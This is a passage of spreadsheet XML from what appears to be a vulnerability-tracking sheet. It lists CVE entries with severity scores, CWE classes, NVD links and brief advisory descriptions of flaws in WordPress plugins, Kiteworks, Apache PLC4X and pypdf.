          <t>Contributor PHP Object Injection in 10Web Booster – Website speed optimization, Cache &amp; Page Speed optimizer &lt;= 2.33.6 versions.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94121</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94678</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Go Live Update Urls &lt;= 7.0.8 versions.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94678</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94683</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in DesignSetGo &lt;= 2.8.0 versions.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94683</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95531</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>Subscriber PHP Object Injection in Conversational Forms for ChatBot &lt;= 1.5.0 versions.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95531</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96831</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Themify Builder &lt;= 7.8.1 versions.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96831</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96837</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Contributor Remote Code Execution (RCE) in CartFlows &lt;= 3.2.0 versions.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96837</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96838</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Blacklist Manager &amp;#8211; WooCommerce Anti-Fraud, Blacklist &amp;amp; Checkout Verification &lt;= 2.3.1 versions.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96838</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97291</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Schema &amp; Structured Data for WP &amp; AMP &lt;= 1.66 versions.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97291</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102092</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Stored Cross-site Scripting (XSS) that could allow an authenticated user to store crafted content that executes arbitrary JavaScript in another user's authenticated session when they preview shared content. This could potentially lead to session compromise and account takeover.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102092</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102100</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Stored Cross-Site Scripting. A stored cross-site scripting (XSS) weakness in Kiteworks Core could allow an authenticated user to submit content that, when later viewed by another user, executes arbitrary JavaScript in that user's authenticated session. This could be used to perform actions on the victim's behalf and may have permitted account takeover, including of higher-privileged users. Exploitation requires the victim to view the attacker-supplied content.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102100</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102509</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>Memory Allocation with Excessive Size Value, Allocation of Resources Without Limits, and Uncontrolled Recursion in the Java implementation of Apache PLC4X (PLC4J) allow a malicious or impersonated device to exhaust the memory or stack of the client application, causing a denial of service.
In the OPC UA driver these defects are reachable before authentication: the offending data is parsed while the secure channel and session are being established, before the server's identity has been bound to it. Configuring a trusted server therefore does not prevent exploitation by an attacker who can 
impersonate it.
The individual defects are:
- Length-prefixed byte strings are allocated at the size claimed on the wire before the length is checked against the data actually received (0.10.0 through 0.13.1).
- Array fields in generated protocol parsers pre-allocate a list with the element count claimed on the wire, allowing a single count field to trigger a multi-gigabyte allocation. This parser is shared by all PLC4J drivers; the OPC UA driver is the verified pre-authentication path (0.10.0 through 0.13.1).
- The OPC UA driver accumulates message chunks without enforcing the negotiated maximum chunk count and message size (0.12.0 through 0.13.1).
- The OPC UA driver pre-allocates collections using element counts received from the server (0.10.0 through 0.13.1).
- Recursive protocol types are parsed without a nesting-depth limit. The same defect in the Go implementation is covered by  CVE-2026-102510 https://cveprocess.apache.org/cve5/CVE-2026-102510 .
This issue affects Apache PLC4X: from 0.10.0 before 1.0.0.
Users are recommended to upgrade to version 1.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102509</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102510</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-190, CWE-674, CWE-789</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>Integer Overflow, Improper Validation of Array Index, Uncontrolled Recursion and Memory Allocation with Excessive Size Value in the Go implementation of Apache PLC4X (PLC4Go) allow a malicious device, or an attacker able to inject network traffic, to crash or exhaust the memory of the client application,
causing a denial of service.
The individual defects are:
- Generated parsers pre-allocate arrays with the element count claimed on the wire (0.13.0 through 0.13.1).
- Transport read helpers allocate buffers of the size claimed on the wire without an upper bound.
- ADS and KNXnet/IP response handling indexes into received data without checking its length, causing a panic.
- ADS and EIP frame-length handling accepts, or arithmetically wraps to, a length of zero, breaking message framing.
- Recursive protocol types are parsed without a nesting-depth limit. The same defect in the Java implementation is covered by  CVE-2026-102509 https://cveprocess.apache.org/cve5/CVE-2026-102509 .
Additionally, length and position arithmetic in generated serializers was performed in 16-bit integers. If an application forwards attacker-influenced payloads larger than 8 KB, the length field wraps, and the remainder of the payload may be interpreted by the receiving device (for example, an ADS PLC) as 
additional, independent protocol messages.
This issue affects Apache PLC4X: from 0.11.0 before 1.0.0. PLC4Go is consumed as the Go module github.com/apache/plc4x/plc4go; versions refer to the corresponding Apache PLC4X releases.
Users are recommended to upgrade to version 1.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102510</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102993</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.17.0, a crafted PDF can provide unusually large Roman page-label values that cause pypdf/_page_labels.py to generate excessively large numeral strings when an application retrieves document page labels, consuming large amounts of memory and potentially making the application unavailable. This issue is fixed in version 6.17.0.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102993</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102994</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.0, a crafted PDF containing indirect-object identifiers or generation-number tokens that continue for a long time without whitespace can cause pypdf/_reader.py and pypdf/generic/_base.py to scan excessive input through read_until_whitespace, resulting in long runtimes and application unavailability. This issue is fixed in version 6.18.0.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102994</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102995</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF can place unusually large source-code or destination-string tokens in a font /ToUnicode mapping, causing pypdf/_cmap.py parse_bfchar to decode and retain oversized values during operations such as text extraction and consume excessive memory. This is a second follow-up to earlier /ToUnicode resource-consumption fixes and is limited to the remaining token-length path. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102995</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102996</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF can provide a TrueType or Type1 simple font with an unusually large /Widths array, causing pypdf/_font.py Font._collect_tt_t1_character_widths to process entries beyond the 256 character codes meaningful for a simple font and consume excessive memory during operations such as text extraction. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102996</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102997</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
